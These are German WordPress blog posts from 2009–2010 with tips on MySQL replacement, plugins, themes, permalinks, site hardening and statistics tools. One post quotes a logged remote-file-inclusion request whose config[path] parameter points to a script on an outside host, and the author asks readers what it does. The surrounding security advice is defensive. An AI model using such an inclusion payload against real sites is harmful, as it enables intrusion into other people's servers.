dropspace » Wordpress

Suchen und Ersetzen in MySQL

Tom — Mon, 03 May 2010 18:19:38 +0000

Folgender Befehl ersetzt in der SQL Tabelle wp_posts den Inhalt ‘Zu-suchender-Text’ durch ‘Ersatztext’

UPDATE wp_posts SET post_content = REPLACE ( post_content, 'Zu-suchender-Text', 'Ersatztext');

Damit Spart man sich z.B. Probleme beim Wiederupload. Bei mir war die maximale Datenbankgröße für den Import nämlich auf 2MB beschränkt.

via cywhale

Free WordPress Themes Sammlung

Tom — Sat, 24 Apr 2010 11:31:11 +0000

Momentan bin ich mit dem iNove Theme, was hier läuft, recht zufrieden.
Trotzdem schaue ich immer wieder gerne WordPress Theme Demos an.
Besonders aufgefallen sind mir dabei folgende Designs, die alle eine übersichtliche Navigationsleiste und einen hellen Texthintergrund haben:

Wer hier noch nichts passendes gefunden hat, kann bei WordPress.org oder wordpressthemesbase.com weiterstöbern.

Frei heißt übrigens bei WordPress Themes meist, dass sie unter CC-Lizenz veröffentlicht sind und der Backlink zum Autoren im Footer bestehen bleiben muss. Will man ihn entfernen, reicht meist eine kleine Spende an den Autoren.
Interessant ist in diesem Zusammenhang die Diskussion, ob Themes nicht, wie die meisten WordPress Plugins, unter GPL fallen müssten, sofern sie auf WordPress API mit Funktionen wie “wp_head” zurückgreifen (via WordPressPlugins).

Meine WordPress Plugins

Tom — Thu, 28 Jan 2010 14:20:15 +0000

Da ich diese Liste auf anderen Blogs auch immer gern nach neuen Plugins durchforstet habe, hier mal die bei mir momentan aktiven Plugins:

Akismet – Das allgegenwärtige Antispamplugin des WordPress Machers
All in One SEO Pack – Übernimmt alle möglichen Suchmaschinenoptimierungen von Titel bis Meta Description.
Category Cloud Widget – Erstellt die Tagcloud aus den Kategorien statt Tags
Chap Secure Login – Verschlüsselt den Login (Kein SSL)
Code Markup – Verhindert Probleme beim Posten von HTML u.a. Code
FAlbum – Bindet Flickr Fotos in WordPress ein
Google XML Sitemaps – Erstellt Sitemaps für den Google Bot
Limit Login Attempts – Erschwert Bruteforce Angriffe auf den Login
OpenSearch – Ermöglicht das Hinzufügen des Blogs zur Schnellsuche des Browsers
PHP Execution – Ermöglicht das ausführen von PHP in Posts (Für die FAlbum Integration)
PXS-Mail Form – Erstellt das Kontaktformular
Raven’s Antispam – Schützt per Javascript (was Bots meist nicht können) vor Kommentarspam
Related Posts by Category – Bietet verwandte Seiten am Ende von Artikeln per Kategorie an
Simple Trackback Validation – Verhindert Trackback Spam
Smart Youtube – Vereinfacht das Einbinden von Youtube Videos
WordPress Database Backup – Schickt mir wöchentlich ein Backup per Mail
WordPress Mobile Edition – Ein Template für Handys
WP-Easy Archvies – Übernimmt das erstellen der Archivseite
WP-Memory-Usage – Arbeitsspeicherverbrauch auf dem Server zeigen

Falls hier noch ein wichtiges Plugin fehlt, freue ich mich über einen Kommentar.

WordPress Gallery Styles entfernen

Tom — Fri, 27 Nov 2009 15:01:34 +0000

WordPress hat eine tollte Galerie Funktion integriert.
Leider schreibt die einem ungefragt neue Styles in die Seite.
Da ich die Galerie optisch anpassen wollte brauchte musste ich die Standard Styles loswerden.

Fündig wurde ich sivel.net. Der Trick war, folgende Zeilen zur functions.php des Themes hinzuzufügen:

add_filter('gallery_style', create_function('$a', 'return "

";'));

?>

Damit man anschließend beim Login oder Logout nicht folgende Meldung zu sehen bekommt,
Warning: Cannot modify header information - headers already sent ...
sollte man alle Leerzeilen- und zeichen in der functions.php löschen.

Geschwindigkeit von WordPress Permalinks

Tom — Wed, 21 Oct 2009 15:02:43 +0000

Ich habe per Zufall im WordPress Codex gelesen, dass eine Verwendung von %postname% oder %category% ohne Zahlenwerte wie ID oder Datum, zu Performanceeinbußen führt.
Für den Leser ist eine lange URL aber weniger sinnvoll, weshalb ein paar Millisekunden mich nicht stören würden. SEOtechnisch ist eine kurze URL sicher auch nicht verkehrt.
Weil fast alle größeren Blogs und Newsseiten aber mindestens eine Zahl im Seitennamen haben, hat mich das schon ein wenig verunsichert.
Laut sw-guide ist die Performance ohne Zahl im Seitennamen nur schlechter, wenn man viele Seiten hat (nicht Posts). Auf Playground lese ich dagegen, dass es generell bei größeren Projekten sinnvoll ist.
Also Permalink Struktur vorsichtshalber umstellen?

Zumindest ist dank mod_rewrite keine Eile geboten. Die nötigen Zeilen generiert natürlich auch das Permalink Migration Plugin. Deutlich mehr Optionen bietet das Redirection Plugin von UrbanGiraffe.

What the heck?

Tom — Mon, 10 Aug 2009 17:02:36 +0000

Ein fleißiger Hacker mit folgender Hausnummer 116.122.158.207 hat heute diese Adresse aufrufen wollen:
http://www.knevels.org///admin.php?includes&config[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt??
Falls jemand den Hack kennt:was bewirkt er, wenn er funktioniert und bei welcher WordPress version? Sieht für mich aus wie das Einfügen eines neuen Users.

Folgenden Inhalt hatte die Textdatei:
zfxid.txt

WordPress gegen Hacker sichern

Tom — Tue, 28 Jul 2009 17:26:30 +0000

Ok, eigentlich müsste es Cracker heißen, denn Hacker sind weniger schlimm, da sie aus reinem Interesse und ohne Schadensabsicht in ein System eindringen.
Seine WordPress Installation kann man ein wenig absichern, indem man einen Hinweis auf das verwendete CMS aus den Meta-tags entfernt, die Dateirechte einschränkt, ein anderes Prefix als wp_ für seine Datenbank verwendet und natürlich immer die aktuelleste Version verwendet.
Bei der Installation oder Update sollte man noch darauf achten, in seiner wp-config einen secure key anzugeben (oder per Plugin einzustellen). Wenn man sich schonmal von unterwegs einloggt, ist ein verschlüsselter Login und eine Begrenzung der Anmeldeversuche gegen Bruteforce Attacken sinnvoll.

Dabei helfen folgende Plugins:

Sicherheitslücken entdecken und schließen. WP Security Scan Autor // wp.org (achtung, in WP 2.8.2 wurden in wpknorg01_user nicht alle Werte umbenannt, weshalb ich mich nicht mehr anmelden konnte)
Login Datenübergabe verschlüsseln mit Chap Secure Login Autor // wp.org
Einen persönlichen Login wie z.B. www.xyz.de/login statt /wp-admin nutzen mit Stealth Login

Im Blog von Sergej Müller werden noch ein paar gute Tipps zum Absichern des Adminbereichs gegeben:

WordPress nicht direkt in den www Root installieren (auch der Übersichtlichkeit halber)
wp-config.php per .htaccess sperren (.htacces ins gleiche Verzeichnis wie wp-config.php)
Benutzernamen ändern / admin löschen (Benutzernamen root vermeiden )
wp-login.php per .htaccess mit Passwortschutz ausstatten und evtl. Login auf bestimmte IP-Adressen beschränken
Rückmeldung bei der Username / Passworteingabe unterbinden. Dazu in der functions.php des Themes folgendes hinzufügen:

add_filter('login_errors',create_function('$a', "return null;"));

Anzahl der Login-Versuche beschränken mit limit login attempts / mirror

Um den Erfolg seiner Bemühungen zu überprüfen kann man die Website WPSCAN benutzen (braucht Plugin oder ein im head-bereich). Der WPSCAN Scanner überprüft natürlich nicht die Passwortstärke.
Wenn man alles richtig gemacht hat und WordPress in einen Unterordner installiert, schlägt allerdings der Scan der Zugriffsrechte für Ordner mit folgender Meldung fehl:

Warning: fileperms() [function.fileperms]: stat failed for ../.htaccess in /home/******/public_html/wp-content/plugins/wp-security-scan/functions.php on line 22

Dagegen half ein Anpassen des relativen Pfades zu .htaccess in der scanner.php in Zeile 17 bei check_perms.
Wer sich das Plugin sparen will, hier die Empfehlungen des Plugins:

Ordner	Schreibrechte
root directory	755
wp-includes	755
.htaccess	644
wp-admin/index.php	644
wp-admin/js	755
wp-content/theme	755
wp-content/plugins	755
wp-admin	755
wp-content	755

Für den Notfall empfiehlt es sich immer ein Backup seines Themes, der Uploads und der Datenbank anzulegen. Von Il Filosofo gibt es ein Plugin zum automatisierten Datenbankbackup.
Ein komplettes inkrementelles FTP-Backup erstellen z.B. FTPsync und Sitecopy.

Leere Divs ausblenden

Tom — Sun, 12 Jul 2009 04:23:36 +0000

Obwohl Momentan wieder öfter Updates für WordPress herauskommen, ist es noch lange nicht perfekt. Eine sinnvolle Ergänzung für WP-Themes, die ich länger suchen musste, stellt Eric Martin in seinem Blog vor. Und zwar hatte ich das Problem, dass ich in der archive.php für die next_post_links ein wenig margin zum div hinzufügen wollte. Bei Themen, wo ich nicht so so viel geschrieben habe, also keine next_post_links benötigt werden, war der div für die Links aber weiter vorhanden und sorgte für einen zu großen Abstand zwischen Inhalt und Überschrift.
Leider hat WordPress keine Funktion integriert, mit der man den Container automatisch ausblenden kann. Abhilfe schafft ein Eintrag in die functions.php:
/** * If more than one page exists, return TRUE. */ function show_posts_nav() { global $wpknorg01_query; return ($wpknorg01_query->max_num_pages > 1); }
und das Ergänzen der archive.php durch

Statistik Tools & Plugins

Tom — Thu, 12 Feb 2009 15:28:53 +0000

Wer gern weiß, welche Artikel seine Besucher besonders interessieren und welche Technik diese benutzen, für den sind die folgenden Tools & Plugins interessant:

WordPress Plugins:

Semmelstatz – Oft gelobt, da guter Botfilter
StatPress – Sehr detailliert, incl. Grafik und Liste der letzten IPs
CounterizeII – Alle Infos mit Balkengrafik auf einere Seite (incl. Bot & IPblocker)
ShortStat2 – Pure Information mit allen Daten auf einen Blick, 0 Grafik aber übersichtlich
WordPress.com Stats – Die API Lösung für Umsteiger (Erfordert seperaten Login)

PHP Statistik Tools

phpTrafficA – Vor allem für kleine Seiten interssant
Piwik – Google Analytics Konkurrenz
Grape – Übersichtlichstes und schnellstes Statistiktool
BBClone – So übersichtlich wie Grape aber mit deutlich mehr Informationsgehalt

JAWStats – Auf awstats aufsetzend, benötigt leider Zugriff auf die Apache Installation. Mein Favorit – Demo

Noch bin ich mir nicht sicher, für welches Tool ich mich entscheiden werde. Vielversprechend sehen zumindest Piwik und PHPTraffica aus. Mit Rootaccess auf Apache würde meine Wahl wohl auf JAWStats fallen.

Wordpess 2.7 Admin Interfaces

Tom — Thu, 05 Feb 2009 17:12:14 +0000

Admin Drop Down Menu

WordPress hat mit der Version 2.7 ein komplett überarbeitetes Interface-Design erhalten. Trotzdem finde ich es nicht besonders übersichtlich, weshalb ich hier eine kleine Auswahl an Alternativen und Ergänzungen zusammengetragen habe.

Fluency Admin 2.0 – Hover Menü am linken Bildschirmrand
Admin Drop Down Menu – Dropdown statt sidebar mit famfam Icons
Admin Management Extended – Ajax-beschleunigung für Schnelleres Artikeltaggen / Datumsänderungen etc. ohne Reload
Adminimize – Neue Farbschemen, Möglichkeit den Adminpanel-Footer auszublenden, Userabhängige Farbschemen, Menüeinträge ausblenden und viele Backend-Einstellungen